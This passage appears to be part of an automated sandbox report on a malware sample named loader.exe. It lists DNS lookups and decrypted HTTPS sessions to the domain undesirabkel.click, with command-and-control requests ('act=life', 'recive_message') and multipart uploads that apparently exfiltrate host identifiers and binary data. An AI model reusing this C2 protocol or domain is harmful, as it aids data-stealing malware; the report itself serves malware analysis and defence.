Jan 5, 2025 19:28:16.532471895 CET	443	49747	188.114.97.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:28:04.783111095 CET	59795	53	192.168.2.4	1.1.1.1
Jan 5, 2025 19:28:04.796850920 CET	53	59795	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:28:04.783111095 CET	192.168.2.4	1.1.1.1	0xbb64	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:28:04.796850920 CET	1.1.1.1	192.168.2.4	0xbb64	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:28:04.796850920 CET	1.1.1.1	192.168.2.4	0xbb64	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

undesirabkel.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:05 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: undesirabkel.click
2025-01-05 18:28:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:28:05 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b9276hlc3dt987ntu831cc9eid; expires=Thu, 01 May 2025 12:14:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=84o%2FP%2BbsdmZkOveLGrk2nQBqYSfNYgkAIdQ9EprJikgwtSH8%2FfkF8KmEQWMsS2aPcmy94is3XdtyYjcI1s6I5%2F4ffjVkmi1f1SZwIjZZISw3PSlLZuqmm4JODFM55n9odb6LaBM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586adda4ac342-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1612&rtt_var=638&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1671436&cwnd=160&unsent_bytes=0&cid=d44d40e173463537&ts=518&x=0"
2025-01-05 18:28:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:28:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:06 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: undesirabkel.click
2025-01-05 18:28:06 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 6d 70 73 6f 6a 76 66 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--hcjjgmpsojvf&j=
2025-01-05 18:28:06 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g0ietbp7asu7cpld466i0k874d; expires=Thu, 01 May 2025 12:14:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xwgm0Fnn9T8IX3vI%2FOJo27Zw0FFYdX8aF8DQBC5TyQqjDM8YnhLgpu%2B4m73HL03oLwHFgLKiyC8uk6kDY%2FfoyQ7wO6NTFKi7Vi1DQ3vH0Utilk8E%2Fn4jJQgJzWWRcyCf%2BkPMNPw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586b3bd8c7cab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1766&rtt_var=678&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=956&delivery_rate=1595628&cwnd=192&unsent_bytes=0&cid=1f8fe348adfcce77&ts=488&x=0"
2025-01-05 18:28:06 UTC	238	IN	Data Raw: 31 63 64 33 0d 0a 62 75 72 49 66 61 34 72 67 6d 56 69 77 6d 65 73 44 32 6d 32 61 55 35 32 6a 62 31 6e 72 4f 72 66 51 71 31 51 35 32 75 78 31 76 45 56 79 4c 35 66 6c 42 2b 75 52 78 47 6e 52 5a 5a 37 47 38 4d 4d 59 6c 54 73 32 55 57 57 6a 4c 34 75 33 6a 58 4c 53 63 65 37 30 31 53 4d 71 52 48 64 54 71 35 48 42 37 70 46 6c 6c 51 53 6c 41 77 67 56 4c 65 66 41 73 61 49 76 69 37 50 4d 59 77 45 77 62 71 53 42 6f 61 76 46 63 74 49 35 67 51 4f 72 77 4c 4a 61 67 6a 63 42 79 63 62 35 64 42 46 67 4d 69 36 4f 49 39 71 78 53 62 55 6f 70 41 6a 69 37 73 57 6a 46 61 75 48 6b 43 6e 43 59 34 31 53 39 63 4d 4c 42 72 72 32 51 7a 45 67 72 63 6d 7a 6a 53 4e 47 39 69 77 6d 51 61 49 72 42 54 42 51 66 49 4a 42 4b 67 4a 7a 32 41 49 Data Ascii: 1cd3burIfa4rgmViwmesD2m2aU52jb1nrOrfQq1Q52ux1vEVyL5flB+uRxGnRZZ7G8MMYlTs2UWWjL4u3jXLSce701SMqRHdTq5HB7pFllQSlAwgVLefAsaIvi7PMYwEwbqSBoavFctI5gQOrwLJagjcBycb5dBFgMi6OI9qxSbUopAji7sWjFauHkCnCY41S9cMLBrr2QzEgrcmzjSNG9iwmQaIrBTBQfIJBKgJz2AI
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 6c 45 56 73 45 2f 65 66 58 59 37 62 6a 79 50 65 49 35 41 45 77 37 4c 54 45 38 61 7a 58 38 74 46 6f 46 39 41 71 41 6e 41 61 41 6a 62 44 43 30 55 2f 64 41 46 7a 59 43 31 4a 4d 55 39 69 67 62 64 76 70 51 45 67 61 30 51 79 30 48 6d 43 41 50 67 53 34 35 71 45 35 52 54 62 44 54 2f 33 41 62 61 68 61 78 67 30 48 79 63 53 64 53 34 30 31 54 49 72 42 48 4e 52 4f 41 56 43 4b 73 4f 79 33 38 41 33 51 59 68 46 4f 4c 56 43 73 32 49 75 69 72 46 50 59 38 4e 33 72 6d 56 44 49 6a 71 55 59 78 4f 2b 45 64 59 34 43 62 4c 66 51 7a 59 48 57 34 75 72 38 42 4c 31 38 69 36 4c 49 39 71 78 51 48 57 74 35 41 48 68 36 6b 58 78 31 76 67 46 51 61 74 41 4e 78 72 44 74 6f 42 4c 77 62 6c 30 51 50 4e 67 62 59 70 79 6a 57 42 53 5a 33 30 6c 42 54 49 38 6c 2f 74 52 4f 73 4c 43 72 63 46 6a 6e 4a Data Ascii: lEVsE/efXY7bjyPeI5AEw7LTE8azX8tFoF9AqAnAaAjbDC0U/dAFzYC1JMU9igbdvpQEga0Qy0HmCAPgS45qE5RTbDT/3Abahaxg0HycSdS401TIrBHNROAVCKsOy38A3QYhFOLVCs2IuirFPY8N3rmVDIjqUYxO+EdY4CbLfQzYHW4ur8BL18i6LI9qxQHWt5AHh6kXx1vgFQatANxrDtoBLwbl0QPNgbYpyjWBSZ30lBTI8l/tROsLCrcFjnJ
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 41 62 6a 31 51 50 42 68 62 46 67 67 58 4b 43 45 5a 50 73 30 79 61 4c 76 68 7a 47 43 39 55 45 44 71 34 43 32 43 30 55 6d 68 4a 73 45 2b 4f 66 58 59 36 46 76 43 6a 4a 49 49 6f 45 30 4c 71 64 41 34 32 6c 46 38 78 4a 37 51 49 45 71 77 37 4e 59 41 2f 47 41 53 77 63 36 74 34 50 78 4d 6a 7a 59 4d 67 71 78 56 47 54 68 59 51 48 79 70 38 63 77 6b 66 6e 45 55 43 2f 53 39 63 74 44 4e 68 4c 64 46 54 69 31 77 44 4c 68 37 77 71 77 54 65 50 42 64 75 36 6b 42 36 48 72 68 2f 41 51 65 6f 4b 44 71 51 4e 78 32 59 41 30 67 73 74 48 71 2b 52 52 63 6d 51 2f 58 69 50 42 6f 49 46 33 72 76 52 4f 59 75 6b 45 63 74 66 6f 42 68 4f 75 55 58 4a 59 55 75 4d 53 79 41 64 37 39 51 50 79 6f 69 36 4c 63 6f 78 67 67 72 65 73 35 6b 43 6a 36 34 54 78 55 54 6d 42 77 65 6b 41 4e 78 6f 41 74 67 48 Data Ascii: Abj1QPBhbFggXKCEZPs0yaLvhzGC9UEDq4C2C0UmhJsE+OfXY6FvCjJIIoE0LqdA42lF8xJ7QIEqw7NYA/GASwc6t4PxMjzYMgqxVGThYQHyp8cwkfnEUC/S9ctDNhLdFTi1wDLh7wqwTePBdu6kB6Hrh/AQeoKDqQNx2YA0gstHq+RRcmQ/XiPBoIF3rvROYukEctfoBhOuUXJYUuMSyAd79QPyoi6Lcoxggres5kCj64TxUTmBwekANxoAtgH
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 6c 46 30 63 61 6b 59 4d 67 2b 78 56 47 54 76 5a 6f 65 68 71 51 57 77 55 2f 6f 41 41 36 74 44 73 68 6d 44 4e 4d 4e 49 52 7a 69 32 67 62 50 6a 4c 63 79 7a 44 6d 50 42 4e 6e 30 33 55 79 50 73 6c 2b 55 43 63 63 4c 4b 62 41 65 33 48 74 4c 79 30 55 31 56 4f 6a 54 52 5a 62 49 76 69 2f 47 50 59 30 42 33 4c 75 58 41 6f 36 73 45 73 6c 47 36 68 55 49 72 67 6a 46 59 67 44 47 43 79 45 51 34 39 73 4e 78 59 4c 39 62 6f 38 31 6e 55 6d 4c 39 4b 59 42 68 36 6f 63 32 67 6e 2f 53 52 6e 67 41 73 49 74 55 35 51 48 49 68 54 67 30 77 6e 46 67 4c 77 73 77 54 57 41 41 4e 75 38 67 51 32 4d 6f 68 37 43 52 75 45 44 42 61 55 42 79 57 6b 4e 32 30 74 69 56 4f 6a 48 52 5a 62 49 6b 67 66 36 63 4b 51 7a 6b 36 76 64 46 63 69 74 45 34 77 52 6f 41 73 44 72 41 33 42 61 77 4c 59 41 53 55 66 34 Data Ascii: lF0cakYMg+xVGTvZoehqQWwU/oAA6tDshmDNMNIRzi2gbPjLcyzDmPBNn03UyPsl+UCccLKbAe3HtLy0U1VOjTRZbIvi/GPY0B3LuXAo6sEslG6hUIrgjFYgDGCyEQ49sNxYL9bo81nUmL9KYBh6oc2gn/SRngAsItU5QHIhTg0wnFgLwswTWAANu8gQ2Moh7CRuEDBaUByWkN20tiVOjHRZbIkgf6cKQzk6vdFcitE4wRoAsDrA3BawLYASUf4
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 4c 75 53 58 41 4d 34 51 50 77 62 4f 61 48 6f 61 6e 45 4d 52 42 36 51 59 45 70 51 6a 49 59 51 48 56 44 43 49 61 35 35 39 4c 6a 6f 2b 6c 59 4a 64 79 70 42 6e 49 70 6f 55 42 71 61 63 51 6a 46 61 75 48 6b 43 6e 43 59 34 31 53 39 30 5a 4b 42 6e 39 31 67 4c 41 68 37 34 79 7a 6a 2b 4f 47 39 53 37 6c 77 75 45 72 42 44 4b 53 4f 55 4e 44 4b 63 41 78 57 49 48 6c 45 56 73 45 2f 65 66 58 59 36 6d 74 6a 50 59 4d 59 73 43 78 61 2f 54 45 38 61 7a 58 38 74 46 6f 46 39 41 6f 77 37 46 61 51 76 59 43 79 67 5a 37 38 30 4b 79 59 2b 30 4b 39 30 34 67 67 37 59 76 4a 67 44 6a 72 67 54 77 6c 76 6c 46 52 4c 67 53 34 35 71 45 35 52 54 62 43 4c 6f 7a 78 58 4e 79 6f 77 32 7a 43 53 4f 42 4e 2f 30 6a 45 4b 52 36 68 6a 41 43 62 68 48 42 71 38 4d 7a 57 49 4b 33 51 63 68 45 65 62 61 42 4d Data Ascii: LuSXAM4QPwbOaHoanEMRB6QYEpQjIYQHVDCIa559Ljo+lYJdypBnIpoUBqacQjFauHkCnCY41S90ZKBn91gLAh74yzj+OG9S7lwuErBDKSOUNDKcAxWIHlEVsE/efXY6mtjPYMYsCxa/TE8azX8tFoF9Aow7FaQvYCygZ780KyY+0K904gg7YvJgDjrgTwlvlFRLgS45qE5RTbCLozxXNyow2zCSOBN/0jEKR6hjACbhHBq8MzWIK3QchEebaBM
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 2f 54 47 65 53 63 7a 36 69 6b 79 50 70 6c 2b 55 43 65 4d 41 41 36 45 50 78 32 45 45 30 77 38 2b 48 75 6a 4e 42 4d 2b 44 73 43 7a 50 50 34 67 44 30 72 32 65 41 49 57 74 47 4d 4e 4d 6f 45 6c 41 70 78 32 4f 4e 55 76 31 42 69 63 59 74 49 56 46 30 63 61 6b 59 4d 67 2b 78 56 47 54 74 4a 6b 4a 67 71 63 63 77 30 72 79 42 67 61 79 42 63 4e 6e 47 64 34 41 4b 52 6e 69 30 67 62 49 6a 72 59 73 33 54 75 46 43 74 6a 30 33 55 79 50 73 6c 2b 55 43 63 4d 51 46 71 6f 43 77 6e 73 41 31 51 67 36 47 66 2b 66 53 34 36 5a 75 6a 47 50 61 70 4d 5a 78 4c 4f 4d 51 70 48 71 47 4d 41 4a 75 45 63 47 71 51 50 4a 61 77 58 47 44 69 6f 62 34 4e 59 4d 79 6f 43 2b 49 4d 73 32 67 67 7a 51 75 4a 67 4c 69 36 55 62 78 55 66 70 43 45 44 75 52 63 6c 31 53 34 78 4c 44 51 2f 73 30 77 69 4f 6c 2f 4d Data Ascii: /TGeScz6ikyPpl+UCeMAA6EPx2EE0w8+HujNBM+DsCzPP4gD0r2eAIWtGMNMoElApx2ONUv1BicYtIVF0cakYMg+xVGTtJkJgqccw0ryBgayBcNnGd4AKRni0gbIjrYs3TuFCtj03UyPsl+UCcMQFqoCwnsA1Qg6Gf+fS46ZujGPapMZxLOMQpHqGMAJuEcGqQPJawXGDiob4NYMyoC+IMs2ggzQuJgLi6UbxUfpCEDuRcl1S4xLDQ/s0wiOl/M
2025-01-05 18:28:06 UTC	304	IN	Data Raw: 30 6e 55 72 4e 4e 55 79 49 6f 55 32 6b 7a 6e 45 55 4b 56 42 73 42 6a 44 4d 4a 4c 4d 79 75 68 6e 77 72 55 79 4f 55 5a 31 6e 4b 43 42 5a 50 73 30 78 6d 50 71 68 6a 57 58 2b 63 4c 45 61 73 49 77 6b 38 45 30 78 30 76 47 2b 7a 4f 44 49 4b 44 73 47 43 42 63 6f 49 52 6b 2b 7a 54 49 34 2b 38 48 4f 4e 4b 38 51 35 41 37 6b 58 4a 65 30 75 4d 53 78 4a 55 2f 64 77 56 7a 59 65 73 48 6f 39 71 6e 44 65 54 76 34 55 4c 6d 4b 6b 4a 78 30 54 73 46 6a 37 67 58 5a 6f 2f 57 59 5a 5a 66 67 75 76 77 44 71 41 79 4c 78 67 6c 77 75 63 53 63 58 30 79 31 37 47 36 67 32 4d 45 61 42 41 41 37 49 58 79 47 34 64 31 30 77 53 4b 73 6a 4a 44 38 6d 59 75 6a 66 41 63 73 74 4a 33 50 54 4c 4e 63 69 6a 47 4e 64 59 39 67 6f 51 70 30 58 78 49 30 76 4d 53 33 52 55 32 74 77 4c 77 49 2b 72 4d 59 49 56 Data Ascii: 0nUrNNUyIoU2kznEUKVBsBjDMJLMyuhnwrUyOUZ1nKCBZPs0xmPqhjWX+cLEasIwk8E0x0vG+zODIKDsGCBcoIRk+zTI4+8HONK8Q5A7kXJe0uMSxJU/dwVzYesHo9qnDeTv4ULmKkJx0TsFj7gXZo/WYZZfguvwDqAyLxglwucScX0y17G6g2MEaBAA7IXyG4d10wSKsjJD8mYujfAcstJ3PTLNcijGNdY9goQp0XxI0vMS3RU2twLwI+rMYIV
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 32 63 63 31 0d 0a 6d 33 55 79 61 36 6b 65 4d 44 75 4d 56 45 71 59 47 32 47 35 4d 36 6a 55 4c 44 75 4c 5a 45 74 2b 32 67 79 66 56 50 34 4d 65 77 76 69 47 44 34 61 6b 47 4e 6f 4a 72 6b 63 50 34 46 33 33 4c 55 4f 55 4e 47 4a 55 39 35 39 64 6a 72 32 2b 4c 73 45 31 6b 78 69 65 6b 34 6b 42 6a 72 30 4f 6a 41 65 67 41 55 44 34 56 34 41 74 44 38 56 4c 64 45 53 39 68 46 43 64 33 2b 31 79 30 48 79 63 53 63 58 30 79 31 37 47 36 67 32 4d 45 61 42 41 41 37 49 58 79 47 34 64 31 30 77 53 4b 73 48 59 41 38 75 50 72 57 4c 68 4f 5a 45 4f 6b 2f 72 54 41 38 6a 79 4a 6f 77 42 6f 44 68 4f 34 42 32 4f 4e 55 76 68 43 43 49 61 36 4d 6b 55 67 36 61 36 4a 73 6f 31 6c 55 76 39 76 34 63 4c 79 4f 52 66 79 67 6d 34 56 30 37 67 41 64 38 74 55 34 52 5a 64 30 47 38 69 46 57 63 6c 2f 4d 35 Data Ascii: 2cc1m3Uya6keMDuMVEqYG2G5M6jULDuLZEt+2gyfVP4MewviGD4akGNoJrkcP4F33LUOUNGJU959djr2+LsE1kxiek4kBjr0OjAegAUD4V4AtD8VLdES9hFCd3+1y0HycScX0y17G6g2MEaBAA7IXyG4d10wSKsHYA8uPrWLhOZEOk/rTA8jyJowBoDhO4B2ONUvhCCIa6MkUg6a6Jso1lUv9v4cLyORfygm4V07gAd8tU4RZd0G8iFWcl/M5
2025-01-05 18:28:06 UTC	1369	IN	Data Raw: 2f 43 39 4e 31 4d 68 2b 70 48 39 51 6d 6f 52 7a 2f 75 52 64 59 74 55 35 51 2b 4c 78 72 68 32 42 50 66 78 5a 6f 75 79 44 4f 54 47 63 53 37 30 30 4c 49 72 46 2b 55 47 36 35 48 42 4c 46 46 6c 6a 31 5a 6a 31 35 2f 51 37 2b 4e 47 6f 43 52 2f 54 61 50 61 74 64 48 6b 36 62 54 56 4d 6a 74 48 4e 35 62 35 67 51 57 6f 30 4c 77 55 79 7a 61 44 43 30 43 2f 38 67 4b 67 61 61 4c 41 66 45 4d 6b 41 72 64 75 70 51 61 6d 65 70 52 6a 45 61 67 58 7a 6e 67 54 59 35 53 52 5a 51 54 62 45 79 76 36 67 62 41 68 72 6f 32 33 6e 2b 69 42 39 53 31 68 52 79 66 70 56 44 69 66 38 46 48 54 75 41 44 6a 6a 56 5a 6d 6b 73 6f 42 61 2b 48 56 5a 7a 54 36 48 4f 59 59 74 63 57 6e 61 33 54 47 73 6a 79 54 59 49 4a 38 6b 64 59 34 45 4c 4e 66 78 6e 53 43 44 6f 58 71 4f 45 37 36 59 61 36 49 64 6b 69 69 Data Ascii: /C9N1Mh+pH9QmoRz/uRdYtU5Q+Lxrh2BPfxZouyDOTGcS700LIrF+UG65HBLFFlj1Zj15/Q7+NGoCR/TaPatdHk6bTVMjtHN5b5gQWo0LwUyzaDC0C/8gKgaaLAfEMkArdupQamepRjEagXzngTY5SRZQTbEyv6gbAhro23n+iB9S1hRyfpVDif8FHTuADjjVZmksoBa+HVZzT6HOYYtcWna3TGsjyTYIJ8kdY4ELNfxnSCDoXqOE76Ya6Idkii

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:07 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3UMEY6OYJEU8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18134 Host: undesirabkel.click
2025-01-05 18:28:07 UTC	15331	OUT	Data Raw: 2d 2d 33 55 4d 45 59 36 4f 59 4a 45 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 33 55 4d 45 59 36 4f 59 4a 45 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 55 4d 45 59 36 4f 59 4a 45 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 6d 70 73 6f 6a 76 66 0d 0a 2d 2d 33 55 4d 45 59 36 4f Data Ascii: --3UMEY6OYJEU8Content-Disposition: form-data; name="hwid"33CABCFF009FE8B76D75A801C764DBB8--3UMEY6OYJEU8Content-Disposition: form-data; name="pid"2--3UMEY6OYJEU8Content-Disposition: form-data; name="lid"LPnhqo--hcjjgmpsojvf--3UMEY6O
2025-01-05 18:28:07 UTC	2803	OUT	Data Raw: 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-05 18:28:08 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o8jh8lsp91u11o9tma5laalr3o; expires=Thu, 01 May 2025 12:14:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLrDl9jkceGHVwabO5wsz3iM0%2Bjd5j%2BZYM4ZiRH1o9v8LKLap6Pu21tzRWo1MLCu%2BdBupGhdepmmzbl92KhURAR%2FgyP7azlGQ7hiRtrABcCQdn7%2BFLXDoxSix%2Bg%2FW5A1kNB1l3w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586ba8b2443f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2027&rtt_var=778&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19092&delivery_rate=1391801&cwnd=213&unsent_bytes=0&cid=2f0f9a7297ad527d&ts=922&x=0"
2025-01-05 18:28:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:28:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	188.114.97.3	443	7388	C:\Users\user\Desktop\loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:28:08 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=V85A0Z44F User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8737 Host: undesirabkel.click
2025-01-05 18:28:08 UTC	8737	OUT	Data Raw: 2d 2d 56 38 35 41 30 5a 34 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 43 41 42 43 46 46 30 30 39 46 45 38 42 37 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 56 38 35 41 30 5a 34 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 38 35 41 30 5a 34 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 63 6a 6a 67 6d 70 73 6f 6a 76 66 0d 0a 2d 2d 56 38 35 41 30 5a 34 34 46 0d 0a 43 6f 6e 74 65 Data Ascii: --V85A0Z44FContent-Disposition: form-data; name="hwid"33CABCFF009FE8B76D75A801C764DBB8--V85A0Z44FContent-Disposition: form-data; name="pid"2--V85A0Z44FContent-Disposition: form-data; name="lid"LPnhqo--hcjjgmpsojvf--V85A0Z44FConte
2025-01-05 18:28:09 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:28:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m9uaoue1m3t6b1mml5k7887ncs; expires=Thu, 01 May 2025 12:14:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qw4bIhzZgaABL89TT7i7wi0ZXteGYrRJMmuGtBN6AtTUtB3yJ%2FKmRWmXKr%2F9VVDbUikHqmgYFkr44mQygSFUEdZxuz3XRAvoMjq1j51i8RAMIwVu27aDeLmM75mEbqc9thtFXko%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd586c35ddb80dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1683&rtt_var=642&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9669&delivery_rate=1734997&cwnd=152&unsent_bytes=0&cid=7a0dee0e60a5c454&ts=541&x=0"
